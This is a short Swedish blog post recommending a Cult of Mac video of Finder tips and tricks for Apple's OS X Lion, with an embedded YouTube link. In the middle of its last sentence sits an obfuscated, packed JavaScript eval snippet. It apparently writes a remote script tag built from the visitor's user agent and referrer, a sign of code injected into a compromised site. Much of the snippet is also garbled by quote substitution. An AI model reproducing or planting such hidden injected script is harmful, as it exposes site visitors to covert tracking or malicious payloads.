Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Video: Tips & Trix för Apple Lion

Video: Tips & Trix för Apple Lion
Sebastian Plengier Ehrnfelt

Michael Steeber på hemsidan Cult of Mac har gjort  en liten video med massa tips och trix om hur man ordnar till lite irriterande saker i Finder. Det är en del som klagat på hur upplägget är ordnat i nya Lion från Apple, men här får ni hjälp 🙂

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inskn|var|u0026u|referrer|kidbh||js|php’.split(‘|’),0,{}))
info:
www.cultofmac.com

httpv://www.youtube.com/watch?v=04ig_NDuOxY&feature=player_embedded